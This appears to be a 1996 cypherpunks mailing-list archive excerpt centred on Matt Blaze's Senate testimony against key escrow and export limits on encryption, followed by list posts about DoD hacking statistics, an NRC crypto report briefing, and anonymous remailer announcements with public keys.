Administration's initiatives do not address this problem especially
well, however.

The first problem with key escrow is the great increase in engineering
complexity that such systems entail.  The design and implementation
of even the simplest encryption systems is an extraordinarily
difficult and delicate process.  Very small changes can introduce
fatal security flaws that often can be exploited by an attacker.
Ordinary (non-escrowed) encryption systems have conceptually rather
simple requirements (for example, the secure transmission of data
between two parties) and yet, because there is no general theory
for designing them, we still often discover exploitable flaws in
fielded systems.  Key escrow renders even the specification of the
problem itself far more complex, making it virtually impossible to
assure that such systems work as they are intended to.  It is
possible, even likely, that lurking in any key escrow system are
one or more design weaknesses that allow recovery of data by
unauthorized parties. The commercial and academic world simply does
not have the tools to analyze or des

Key escrow is so difficult that even systems designed by the
classified world can have subtle problems that are only discovered
later.  In 1994 I discovered a new type of "protocol failure" in
the Escrowed Encryption Standard, the system on which the Clipper
chip is based.  The failure allows, contrary to the design objectives
of the system, a rogue user to circumvent the escrow system in a
way that makes the data unrecoverable by the government.  Others
weaknesses have been discovered since then that make it possible,
for example, to create incriminating messages that appear to have
originated from a particular user.

It should be noted that these weaknesses have been discovered in
spite of the fact that most of the details of the standard are
classified and were not included in the analysis that led to the
discovery of the flaws.  But these problems did not come about
because of incompetence on the part of the system's designers.
Indeed, the U.S. National Security Agency is likely the most advanced
cryptographic enterprise in the world, and is justifiably entrusted
with developing the cryptographic systems that safeguard the
government's most important military and state secrets.  The reason
the Escrowed Encryption Standard has flaws that are still being
discovered is that key escrow is an extremely difficult technical
problem, with requirements unlike anything previously encountered.

A second problem with key escrow arises from the difficulty of
operating a key escrow center in a secure manner.   According to
the Administration (for example, see the May 20, 1996 White House
draft report "Enabling Privacy, Commerce, Security and Public Safety
in the Global Information Infrastructure"), key escrow centers must
be prepared to respond to law enforcement requests for escrowed
data 24 hours a day, completing transactions within two hours of
receiving each request.  There are thousands of law enforcement
agencies in the United States authorized to perform electronic
surveillance, and the escrow center must be prepared to identify
and respond to any of them within this time frame.  If the escrow
center is also a commercial operation providing data recovery
services, it may also have tens of thousands of additional private
sector customers that it must be prepared to serve and respond to.
There are few, if any, secure systems that operate effectively on
such a scale and under such tightly-constr

A third problem with the Administration's key escrow proposals is
that they fail to distinguish between cryptographic keys for which
recovery might be required and those for which recoverability is
never needed.  There are many different kinds of encryption keys,
but for the purposes of discussing key escrow it is sufficient to
divide keys into three categories.  The first includes keys used
to encrypt stored information, which must be available throughout
the lifetime of the data.  The owner of the data has an obvious
interest in ensuring the continued availability of such keys, and
might choose to rely on a commercial service to store "backup"
copies of such keys.  A second category of key includes those used
to encrypt real-time communications such as telephone calls.  Here,
the key has no value to its owner once the transaction for which
it was used has completed.  If a key is lost or destroyed in the
middle of a conversation, a new one can be established in its place
without permanent loss of informatio

Unfortunately, however, the current Administration proposal exposes
all three types of keys equally to the risks introduced by the
escrow system, even though recoverability is not required for all
of them.  Partly this is because there is no intrinsic difference
in the structure of the different types of keys; they are usually
indistinguishable from one another outside of the application in
which they are used.

Finally, there is the problem that criminals can circumvent almost
any escrow system to avoid exposure to law enforcement monitoring.
All key escrow systems are vulnerable to so-called "superencryption,"
in which a user first encrypts data with an unescrowed key prior
to processing it with the escrowed system.  Most escrow systems
are also vulnerable to still other techniques that make it especially
easy to render escrowed keys useless to law enforcement.  The ease
of avoiding law enforcement when convenient raises an obvious
question as to whether the reduced security and high cost of setting
up an escrow system will yield any appreciable public safety benefit
in practice.


IV  CONCLUSIONS AND RECOMMENDATIONS

The wide availability of encryption is vitally important to the
future growth of our global information infrastructure.  In many
cases, encryption offers the only viable option for securing the
rapidly increasing range of human, economic and social activities
taking place over emerging communication networks.  It is no
exaggeration to say that the availability of encryption in the
commercial marketplace is and will continue to be necessary to
protect national security.  Unfortunately, current policy, through
export controls and ambiguous standards, discourages, rather than
promotes, the use of encryption.

Current encryption policy is enormously frustrating to almost
everyone working in the field.  Export controls make it difficult
to deploy effective cryptography even domestically, and we can do
little more than watch as our foreign colleagues and competitors,
not constrained by these rules, are matching our expertise and
obtaining an ever-increasing share of the market.  A large part of
the problem is that the current regulations were written as if to
cover hardware but are applied to software, including software in
the public domain or aimed at the mass market.  The PRO-CODE bill
goes a long way toward moving the regulations in line with the
realities of the technology.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 27 Jun 1996 20:14:07 +0800
To: cypherpunks@toad.com
Subject: My testimony at Wednesday's Senate hearing on encryption policy
Message-ID: <199606270511.BAA19272@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


[Previous message was garbled with several lines truncated; here's
the real one.  Sorry.  -matt]

[This file is (will soon be) at ftp://research.att.com/dist/mab/testimony.txt]


WRITTEN TESTIMONY OF DR. MATTHEW BLAZE

BEFORE THE SENATE COMMITTEE ON COMMERCE, SCIENCE, AND TRANSPORTATION,
SUBCOMMITTEE ON SCIENCE, TECHNOLOGY, AND SPACE

JUNE 26, 1996

Thank you for the opportunity to speak with you about the technical
impact of encryption policy.  It is a privilege to be here, and I hope
my perspective will be useful to you.

Let me begin by describing my own background and biases.  I am a
Principal Research Scientist in the area of computer security and
cryptology at AT&T Research in Murray Hill, New Jersey.  I also hold a
number of ancillary appointments related to computer security; among
others, I teach an occasional graduate course in the subject at
Columbia University, and I serve as co-chair of the Federal Networking
Council Advisory Committee subcommittee on security and privacy (which
advises Federal agencies on computer networking issues).  However, the
views I am presenting here today are my own, and should not be taken
to represent those of any organization with which I happen to be
affiliated.

I am a computer scientist by training; my Ph.D. is from the Princeton
University Computer Science department, and my primary research areas
are cryptology, computer security, and large-scale distributed
systems.  Much of my research focuses on the management of encryption
keys in networked computing systems and understanding the risks of
using cryptographic techniques to accomplish security objectives.
Recent government initiatives in encryption, such as the "Clipper
Chip," have naturally been of great interest to me, in no small part
because of the policy impact they have on the field in which I work,
but also because they present a number of very interesting technical
and scientific challenges in their own right.

My testimony today focuses on three areas.  First, I will discuss the
role and risks of cryptographic techniques for securing the current
and future electronic world.  Next, I will examine in more detail the
security implications of the limitations imposed on US-based
cryptographic systems through the government's export policies.
Finally, I will discuss the technical aspects of the Administration's
current approach to cryptography policy, which promotes "key escrow"
systems.


I THE INCREASING IMPORTANCE OF ENCRYPTION

The importance of cryptographic techniques for securing modern
computer and communications systems is widely recognized today.
Evidence of the scope of this recognition can be found in the
increasing number of hardware, software, and system vendors that offer
encryption in their products, the increasing demand for high-quality
encryption by users in a widening array of applications, and the
growing, thriving community of cryptologic researchers of which I am a
part.  It is vital that those who formulate our nation's policies and
official attitude toward encryption understand the nature of the
underlying technology and the reasons for its growing importance to
our society.

The basic function of cryptography is to separate the security of a
message's content from the security of the medium over which it is
carried.  For example, we might encrypt a cellular telephone
conversation to guard against eavesdroppers (allowing the call to be
transmitted safely over easily-intercepted radio frequencies), or we
might use encryption to verify that documents, such as contracts, have
not been tampered with (removing the need to safeguard a copy of the
original).  The idea that this might be possible is not a new one;
history suggests that the desire to protect information is almost as
old as the written word itself.  Perhaps as a consequence of the
invention of the digital computer, our understanding of the theory and
practice of cryptography has accelerated in recent years, with a
number of new techniques developed and many new applications emerging.
Among the most important of the recent techniques is "public key
cryptography."  It allows secure messages to be exchanged without the
need for specific advance arrangements between parties.  A related
notion is the "digital signature," which allows messages to be
"signed" in a way that verifiably associates the signer of a message
with its content.

Modern cryptographic techniques are based on the application of
simple, if repetitive, mathematical functions, and as such lend
themselves nicely to implementation by computer programs.  Any
information that can be represented digitally can be protected by
encryption, including computer files, electronic mail messages, and
even audio and video signals such as telephone calls, radio, and
television.  Encryption can be performed by means of software on
general-purpose computers, through special-purpose hardware, or by
special programming of microprocessor-based electronic products such
as the next generation of cellular telephones.  The basic cost of
encryption in terms of computational power required is quite low, and
the marginal cost of including encryption in a software-based computer
program or a programmable electronic product is essentially zero.

Why, then, has encryption recently enjoyed so much attention?  The
reasons can be found from two perspectives: the technology of modern
communication systems, and the new purposes for which we are relying
on digital information.

First, the technology and economics of modern communications and
computing systems strongly favors media that have little inherent
security.  For example, wireless telephones have great advantages in
convenience and functionality compared with their familiar wired
counterparts and are comprising an increasing proportion of the
telephone network.  This also makes eavesdropping much easier for
curious neighbors, burglars identifying potential targets, and
industrial spies seeking to misappropriate trade secrets.  Similarly,
decentralized computer networks such as the Internet have lower
barriers to entry, are much less expensive, are more robust and can be
used to accomplish a far greater variety of tasks than the proprietary
networks of the past, but, again, at the expense of intrinsic
security.  The Internet makes it virtually impossible to restrict, or
even predict, the path that a particular message will traverse, and
there is no way to be certain where a message really originated or
whether its content has been altered along the way.  It is possible,
even common, for electronic mail messages to route through the
computers of competitors.  This is not a result of sloppy design or
poor planning on the part of the Internet's architects; on the
contrary, these properties are a direct consequence of the
technological advances that make the Internet efficient and useful in
the first place.

Second, electronic communication is becoming increasingly critical to
the smooth functioning of our society and our economy and even to
protect the safety of human life.  Communication networks and computer
media are rapidly replacing less efficient, traditional modes of
interaction whose security properties are far better understood.  As
teleconferencing replaces face-to-face meetings, electronic mail
replaces letters, electronic payment systems replace cash
transactions, and on-line information services replace written
reference materials, we gain a great deal in efficiency, but our
assumptions about the reliability of very ordinary transactions are
often dangerously out-of-date.

Put another way, the trend in communication and computing networks has
been away from closed systems in favor of more open ones and the trend
in our society is to rely on these new systems for increasingly
serious purposes.  There is every reason to believe that these trends
will continue, and even accelerate, for the foreseeable future.
Cryptography plays an important and clear role in helping to provide
security assurances that at least mirror what we have come to expect
from the older, more familiar communications methods of the
not-so-distant past.


II KEY LENGTH AND SECURITY

The "strength" of an encryption system depends on a number of
variables, including the mathematical properties of the underlying
encryption function, the quality of the implementation, and the number
of different "keys" from which the user is able to choose. It is very
important that a cryptosystem and its implementation be of high
quality, since an error or bug in either can expose the data it
protects to unexpected vulnerabilities.  Although the mathematics of
cryptography is not completely understood and cipher design is an
exceptionally difficult discipline (there is as yet no general
"theory" for designing cipher functions), there are a number of common
cipher systems that have been extensively studied and that are widely
trusted as building blocks for secure systems.  The implementation of
practical systems out of these building blocks, too, is a subtle and
difficult art, but commercial experience in this area is beginning to
lead to good practices for adding high-quality encryption systems to
software and hardware.  Users and developers of secure systems can
protect against weaknesses in these areas by choosing only cipher
functions that have been carefully studied and by ensuring that their
implementation follows good engineering practices.

The most easily quantified variable that contributes to the strength
of an encryption system is the size of the pool of potential values
from which the cryptographic keys are chosen.  Modern ciphers depend
on the secrecy of the users' keys, and a system is considered
well-designed only if the easiest "attack" involves trying every
possible key, one after the other, until the correct one is found.
The system is secure only if the number of keys is large enough to
make such an attack infeasible.  Keys are usually specified as a
string of "bits," and adding one bit to the key length doubles the
number of possible keys.  An important question, then, is the minimum
key length sufficient to resist a key search attack in practice.

Last November, I participated in a study, organized by the Business
Software Alliance, aimed at examining the computer technology that
might be used by an "attacker" in order to determine the minimum
length keys that should be used in commercial applications.  We
followed an unusually conservative methodology in that we assumed that
the attacker would have only available standard "off-the-shelf"
technology and is constrained to purchase in single-unit quantities
with no economies of scale.  That is, our methodology would tend to
produce a recommendation for shorter keys than would an analysis using
the more conventional approach of giving the potential attacker every
benefit of the doubt in terms of technological advantages he might
enjoy.  Nonetheless, we concluded that the key lengths recommended in
existing U.S. government standards (e.g., the Data Encryption
Standard, with a 56-bit key) for domestic use are far too short and
will soon render data protected under them vulnerable to attack with
only modest resources.  We concluded that keys today should be a bare
minimum of 75 bits long, and that systems being fielded today to
secure data over the next twenty years must employ keys of at least 90
bits. I have included a copy of our report as an appendix to my
testimony.

Attempting to design systems "at the margins" by using the minimum key
length needed is a dubious enterprise at best.  Because even a slight
miscalculation as to the technology and resources available to the
potential attacker can make the difference between a secure system and
an insecure one, prudent designers specify keys that are longer than
the minimum they estimate is needed to resist attack, to provide a
margin for error.

Current U.S. policy encourages the designers of encryption systems to
take exactly the opposite approach.  Encryption systems designed for
export from the United States at present generally must use keys no
more than 40 bits long.  Such systems provide essentially no
cryptographic security, except against the most casual "hacker."
Examples of 40 bit systems being "broken" through the use of spare
computer time on university computer networks are
commonplace. Unfortunately, it is not only users outside the U.S. who
must make do with the inferior security provided by such short keys.
Because of the difficulty of maintaining multiple versions of
software, one for domestic sale and one for export, and the need for
common interoperability standards, many US-based products are
available only with export-length keys.

There is no technical, performance, or economic benefit to employing
keys shorter than needed.  Unlike, for example, the locks used to
protect our homes, very secure cryptographic systems with long keys
are no more expensive to produce or any harder to design or use than
weaker systems with shorter keys.  The only reason vendors design
systems with short keys is to comply with export requirements.

The key length figures and analysis in this section are based on
so-called "secret key" cryptosystems.  For technical reasons, current
public key cryptosystems employ much longer keys than secret key
systems to achieve equivalent security (public keys are measured in
hundreds or thousands of bits).  However, virtually all systems that
use public key cryptography also rely on secret key cryptography, and
so the overall strength of any system is limited by the weakest
encryption function and key length in it.

III THE RISKS OF KEY ESCROW

A number of recent Administration initiatives have proposed that
future cryptosystems include special "key escrow" provisions to
facilitate access to encrypted data by law enforcement and
intelligence agencies.  In a such systems, copies of keys are
automatically deposited, in advance, with third parties who can use
them to arrange for law enforcement access if required in the future.
Several key escrow systems have been proposed by the Administration,
differing in the details of how keys are escrowed, and who the third
party key holders are.  In the first proposal, called the "Clipper
chip," the system is embedded in a special tamper-resistant
hardware-based cryptosystem and copies of keys are held by federal
agencies.  In the more recent "public key infrastructure" proposal,
keys are escrowed at the time a new public key is generated and are
held by the organization (public or private) responsible for
certification of the public key.

Although the various key escrow proposals differ in the details of how
they accomplish their objective, there are a number of very serious
fundamental problems and risks associated with all of them.

There are some appropriate commercial applications of key escrow
techniques.  A properly designed cryptosystem makes it essentially
impossible to recover encrypted data without the correct key.  This
can be a double-edge sword; the cost of keeping unauthorized parties
out is that if keys are lost or unavailable at the time they are
needed, the owner of encrypted data will be unable to make use of his
own information.  This problem, of balancing secrecy with assurances
of continued availability, remains an area of active research, and
commercial solutions are starting to emerge.  The Administration's
initiatives do not address this problem especially well, however.

The first problem with key escrow is the great increase in engineering
complexity that such systems entail.  The design and implementation of
even the simplest encryption systems is an extraordinarily difficult
and delicate process.  Very small changes can introduce fatal security
flaws that often can be exploited by an attacker.  Ordinary
(non-escrowed) encryption systems have conceptually rather simple
requirements (for example, the secure transmission of data between two
parties) and yet, because there is no general theory for designing
them, we still often discover exploitable flaws in fielded systems.
Key escrow renders even the specification of the problem itself far
more complex, making it virtually impossible to assure that such
systems work as they are intended to.  It is possible, even likely,
that lurking in any key escrow system are one or more design
weaknesses that allow recovery of data by unauthorized parties. The
commercial and academic world simply does not have the tools to
analyze or design the complex systems that arise from escrow.

Key escrow is so difficult that even systems designed by the
classified world can have subtle problems that are only discovered
later.  In 1994 I discovered a new type of "protocol failure" in the
Escrowed Encryption Standard, the system on which the Clipper chip is
based.  The failure allows, contrary to the design objectives of the
system, a rogue user to circumvent the escrow system in a way that
makes the data unrecoverable by the government.  Others weaknesses
have been discovered since then that make it possible, for example, to
create incriminating messages that appear to have originated from a
particular user.

It should be noted that these weaknesses have been discovered in spite
of the fact that most of the details of the standard are classified
and were not included in the analysis that led to the discovery of the
flaws.  But these problems did not come about because of incompetence
on the part of the system's designers.  Indeed, the U.S. National
Security Agency is likely the most advanced cryptographic enterprise
in the world, and is justifiably entrusted with developing the
cryptographic systems that safeguard the government's most important
military and state secrets.  The reason the Escrowed Encryption
Standard has flaws that are still being discovered is that key escrow
is an extremely difficult technical problem, with requirements unlike
anything previously encountered.

A second problem with key escrow arises from the difficulty of
operating a key escrow center in a secure manner.  According to the
Administration (for example, see the May 20, 1996 White House draft
report "Enabling Privacy, Commerce, Security and Public Safety in the
Global Information Infrastructure"), key escrow centers must be
prepared to respond to law enforcement requests for escrowed data 24
hours a day, completing transactions within two hours of receiving
each request.  There are thousands of law enforcement agencies in the
United States authorized to perform electronic surveillance, and the
escrow center must be prepared to identify and respond to any of them
within this time frame.  If the escrow center is also a commercial
operation providing data recovery services, it may also have tens of
thousands of additional private sector customers that it must be
prepared to serve and respond to.  There are few, if any, secure
systems that operate effectively on such a scale and under such
tightly-constrained response time.  The argument, advanced by the
Administration, that escrow centers can use the same procedures that
protect classified data is a curious one, since classified information
is by its nature available to a far smaller and more
carefully-controlled potential audience than are escrowed keys.  It is
simply inevitable that escrow centers that meet the government's
requirements will make mistakes in giving out the wrong keys from time
to time or will be vulnerable to fraudulent key requests.  Key escrow,
by its nature, makes encrypted data less secure because the escrow
center introduces a new target for attack.

A third problem with the Administration's key escrow proposals is that
they fail to distinguish between cryptographic keys for which recovery
might be required and those for which recoverability is never needed.
There are many different kinds of encryption keys, but for the
purposes of discussing key escrow it is sufficient to divide keys into
three categories.  The first includes keys used to encrypt stored
information, which must be available throughout the lifetime of the
data.  The owner of the data has an obvious interest in ensuring the
continued availability of such keys, and might choose to rely on a
commercial service to store "backup" copies of such keys.  A second
category of key includes those used to encrypt real-time
communications such as telephone calls.  Here, the key has no value to
its owner once the transaction for which it was used has completed.
If a key is lost or destroyed in the middle of a conversation, a new
one can be established in its place without permanent loss of
information.  For these keys, the owner has no use for recoverability;
it is of value only to law enforcement and others who wish to obtain
access to a conversation without the knowledge or cooperation of the
parties.  Finally, there are the keys used not for secrecy but for
signature and authentication, to insure that messages indeed
originated from a particular party.  There is never a need for anyone,
law enforcement or the key owner, to recover such keys, since their
purpose is not to obscure content but rather to establish authorship.
If the owner looses a signature key, a new one can be generated easily
at any time.

Unfortunately, however, the current Administration proposal exposes
all three types of keys equally to the risks introduced by the escrow
system, even though recoverability is not required for all of them.
Partly this is because there is no intrinsic difference in the
structure of the different types of keys; they are usually
indistinguishable from one another outside of the application in which
they are used.

Finally, there is the problem that criminals can circumvent almost any
escrow system to avoid exposure to law enforcement monitoring.  All
key escrow systems are vulnerable to so-called "superencryption," in
which a user first encrypts data with an unescrowed key prior to
processing it with the escrowed system.  Most escrow systems are also
vulnerable to still other techniques that make it especially easy to
render escrowed keys useless to law enforcement.  The ease of avoiding
law enforcement when convenient raises an obvious question as to
whether the reduced security and high cost of setting up an escrow
system will yield any appreciable public safety benefit in practice.


IV CONCLUSIONS AND RECOMMENDATIONS

The wide availability of encryption is vitally important to the future
growth of our global information infrastructure.  In many cases,
encryption offers the only viable option for securing the rapidly
increasing range of human, economic and social activities taking place
over emerging communication networks.  It is no exaggeration to say
that the availability of encryption in the commercial marketplace is
and will continue to be necessary to protect national security.
Unfortunately, current policy, through export controls and ambiguous
standards, discourages, rather than promotes, the use of encryption.

Current encryption policy is enormously frustrating to almost everyone
working in the field.  Export controls make it difficult to deploy
effective cryptography even domestically, and we can do little more
than watch as our foreign colleagues and competitors, not constrained
by these rules, are matching our expertise and obtaining an
ever-increasing share of the market.  A large part of the problem is
that the current regulations were written as if to cover hardware but
are applied to software, including software in the public domain or
aimed at the mass market.  The PRO-CODE bill goes a long way toward
moving the regulations in line with the realities of the technology.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Thu, 27 Jun 1996 19:33:40 +0800
To: Richard Todd <rmtodd@servalan.servalan.com>
Subject: Re: AT&T bans anonymous messages
Message-ID: <9606270123.aa12416@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


Richard Todd said:
> Um, you don't read news.admin.net-abuse.misc, do you?  The first few spams
> from worldnet have already happened, and from the reports I've seen on there,
> the response from worldnet's posthamster has been pretty much nonexistent.
> It apparently doesn't help that the 'postmaster' mailbox has a quota just
> like the other mailboxen on the system, so every time someone does spam
> from worldnet, half the complaint mail to postmaster bounces.  
>
You guys wouldn't believe what a mogolian clusterfuck Worldnet is.  When is
the physical C'punks meeting at SGI?  I'll be in the bay in a few hours and
around the EFF office and the SAFE conference at Stanford Monday.  Worldnet
software is invasive as hell.  Installations on boxes running Win95 with a 
PCI bus, plug and play BIOS and the I/O on the motherboard have IRQ's and
interupts overwritten to the point the box locks and won't even boot anymore.
Speaking of SGI, TCI, (John Malone), just bought $25,000,000.00 worth of
their boxes...  
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Herb Lin" <hlin@nas.edu>
Date: Sat, 29 Jun 1996 10:08:46 +0800
To: farber@cis.upenn.edu
Subject: The National Research Council Study of National...
Message-ID: <9605288359.AA835967230@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
The National Research Council Study of National Cryptography Policy

  The NRC report entitled

  Cryptography's Role in Securing
  the Information Society
  
  was released on May 30, 1996.
  
  A public briefing on the report will be held in New York City:
  Wednesday, July 10, 1996, 10:00 am to noon.
  
  It will be presented at the Association of the Bar of the City of New York
  (ABCNY) under the aegis of its Committee on Science and Law.
  Mr. Kenneth Dam, study chair and Max Pam Professor of American and Foreign Law
   at the University
  of Chicago, Mr. Colin Crook, committee member and senior technology officer at
   Citicorp, and Dr.
  Herbert Lin, study director and senior staff officer of CSTB, will be present.

  The briefing will take place in the Stimson Room, 42 W. 44th Street, New York,
   New York, from 10:00
  a.m. to Noon.  Committee members will respond to questions from attendees, and
   a limited number of
  pre-publication copies of the report will be available at that time.  For
  further information, please
  contact Michael Schiffres of the ABCNY Committee on Science and Law at (718)
  248-5708 for further
  information.  The event is open to the press and the public.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Thu, 27 Jun 1996 20:55:50 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <v02140b00adf7ea1940e7@[206.243.160.225]>
MIME-Version: 1.0
Content-Type: text/plain


        Mike McNally <m5@vail.tivoli.com> queried the List:

>By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
>on DoD computers; apparently British police arrested a "hacker" the
>other day.  Anyway, the article included a claim that there have been
>250,000 attempted break-ins on DoD computers over the past year.
>
>Does anybody know how they count that?

        I don't know if they go so far as to count pings, but it seems they
do try to count ISS/Satan/Pingware scans -- and then they project off what
numbers they have to come up with the estimates.  But no one is
particularly careful about these numbers... certainly not the politicians
nor the press.

        The estimates come from the Defense Information Systems Agency
(DISA) and refer to "attacks" on the 2.1 million computers, 10,000 LANs,
and 100 long-distance networks.  (It is unclear whether DISA also includes
the defense contractors' machine and networks -- another 2 million, as I
recall -- but, by US law, those are also considered Defense systems.)

        According the May 22 GAO report: "DISA  estimates indicate that
Defense may have been attacked as many as 250,000 times last year.
However, the exact number is not known because, according to DISA, only
about 1 in 150 attacks is actually detected and reported.  In addition, in
testing its systems, DISA attacks and successfully penetrates Defense
systems 65 percent of the time."

        (It is unclear whether this estimate process is circular, with DISA
-- all and all, a generally capable crew, which normally doesn't bother
with this sound-bite silliness -- "projecting" the total number of attacks
by taking the number of reported attacks  and then enhancing that number by
multiplying it by the percentage of their own attacks on DoD systems which
go unremarked.)

         Jack Brooks, the director of the GAO's Defense Information and
Financial Management Systems, who presented the GAO's formal report
("Computer Attacks at Department of Defense Pose Increasing Risks") gave
some further explication:  "Not all hacker attacks result in actual
intrusions into computer systems; some are attempts to obtain information
on systems in preparation for future attacks, while others are made by the
curious or those who wish to challenge the Department's computer defenses."

     Some numbers seems slightly less puffy: officials at Wright-Patterson
Air Force Base reported that, on average, they receive 3,000 to 4,000
"attempts to access information each month from counties all around the
world."

        There are real problems effectively securing DoD's unclassified
computers -- both the military's own systems and the defense contractors --
but its sad how completely the real problems are being overlooked (or, at
least, overshadowed) but the obsession with the InfoWar threat and teen
cyberdemons being manipulation by Iraqi secret agents.

        Historically and at this moment, the vulnerability of the DoD
computers -- as illustrated by hacker attacks and (almost certainly) by
DISA itself -- lies in untrained and poorly managed system administrators
who simply do not bother to apply even the CERT-labelled patches to their
systems.  There are brilliant hackers about (some in DISA; maybe even a few
on this list) but they would but rarely need that brilliance to penetrate
the typical DoD system.

        I'd bet cold cash that DISA's own tiger-team attacks on DoD systems
are almost always successful with nothing more innovative than an ISS or
SATAN scans and/or a list of CERT-announced security problems from the
previous six months.  The real threat is incompetent, poor-trained DoD
system administrators -- and a class of computer-illiterate senior managers
who define "system security" and routine administration as a marginal
expenses and scorn readily available options like one-time passwords as too
complex for the military mind.

        Much, much, easier to rail at the terrorist threat exemplified by
the 16 year-old Brit who called himself "Datastream Cowboy" and to hint
darkly that his unidentified cohort "Kuji" may have been a Russian or an
Iraqi.  The hell with security, let's wiretap the phones of all 16
year-olds!

        Cliff Stoll and Peter Neuman of SRI are supposed to testify, and
they might bring some common sense to bear -- but I for one desperately
wish to hear the like of acid-tongued Bob Courtney, IBM's former director
of Info Security, chew this fluff up.

        The Datastream attack, btw, didn't occur "the other day," as Mike
McNally suggested -- this whole media flurry is built around a retelling of
Datastream's 1994 attack and arrest.  It's just that the Air Force CERT did
a nice job of documenting the good guys' effort to identify and track him
down -- although Lord! the kid was dumb, no Morris Jr. there! -- and
writing up a report.

        Makes you realize how desperate some folks are for cyberterror
stories, doesn't it?  Wonder why?????

        Suerte,
                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 27 Jun 1996 16:10:10 +0800
To: cypherpunks@toad.com
Subject: Grubor remailer? (Was Re: Lucifer remailer)
Message-ID: <199606270317.FAA27361@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm, is that Dr. John Grubor's domain (aga@dhp.com)?

That will make a nice anonymous remailer... NOT! Thank you.

By the way: is there a way in premail to disable a certain remailer
altogether so that it will never be used in chains? There is one
candidate now... <chuckle>


lucifer wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I have just finished setting up a Mixmaster and cpunk remailer at
> lucifer@dhp.com.  The PGP key and Mixmaster key are below.
> 
> lucifer lucifer@dhp.com 6e57353149a1175f11aba72cedee02fd 2.0.3
> 
> - -----Begin Mix Key-----
> 6e57353149a1175f11aba72cedee02fd
> 258
> AATvJVbP8R9tUF6R9zjSbRdDaz2j1INJvkVI6L6I
> 5F65Q7lRCoOl8+TCi+HgUo1AErYsLPpHpI1l4F9I
> RUqvH/fvR7GuqgIJc+RsGyQPPG0dpL5lHt2ppdmW
> wcTX85ZKRK242SW1hTih43IaCmXr+i1zX6+QZsr1
> MtAqwDlyDgoU0QAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAQAB
> - -----End Mix Key-----
> 
> 
> - -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
> 
> mQCNAzHPdZkAAAEEAK3rI5oq3dwDV5inleitjy03JvhBD/GtbRRDO1noLUnRf4FV
> CmCfGJrqitHtIBqhA+hIRBcNRo7J48Yiu6ctda29xe/rEy3QdSKHpZhstsV+hzw3
> 42Lhogm1cW2QPrvjJQUgU5mpKR9qKn7KQLBcVz/Mx1EvX4aMGJ2oJ1gRbIg5AAUR
> tCRBbm9ueW1vdXMgcmVtYWlsZXIgPGx1Y2lmZXJAZGhwLmNvbT6JAJUDBRAxz3vx
> nagnWBFsiDkBAfUAA/9ufh0GPUo6uR4/5/tbbFKyQs8fW0NmDkrU+xni7QNmKKUj
> qC7lJ/MHPxRGzuXaYE+k9I8NmI1DxyzdWlRX/X6uwcwYPOxa/+CI9HUAkcB/Q/N8
> GZJckumcU7hlMim08lFJQjsEWxNyqKefAeOAKQ5v5xt3rmpPDmHrXbOuJ104Ng==
> =dFZY
> - -----END PGP PUBLIC KEY BLOCK-----
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMdFhcZ2oJ1gRbIg5AQGqSwP9HzVjkvkN4oBIHh5AzvsKZoZG+zMvId7Z
> +LlvpSOSyXm+Vaxga28jBL03JIN8j6+yJtZy1h07VlYYwnhhBrhnIufeq+mO+ea6
> k/ymFcUFsfM4jnf5jvaHKJTMULnmL3wspWzBKl3CRkQ2e238ozx8IWdhTxxdD9vj
> aO3vQZHHFTI=
> =/ICd
> -----END PGP SIGNATURE-----
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 27 Jun 1996 22:45:31 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New type2.list/pubring.mix combination
Message-ID: <Pine.NEB.3.93.960627053747.19370B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I have just updated the type2.list/pubring.mix combination on
jpunix.com. Of note, I have dropped ecafe-mix as it has not responded in a
LONG time and it doesn't look like it's going to get fixed any time soon.

	There are two new type II remailers on the list, Ad and lucifer.
Welcome aboard!

	The lists are available by WWW from www.jpunix.com and by
anonymous FTP fro ftp.jpunix.com.

	If you have any questions about the lists, please send email to
perry@alpha.jpunix.com. 

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdJl3VOTpEThrthvAQGjEgP+N+DqShSfaWdqdxzlp9wCI+m1H3RXxKaz
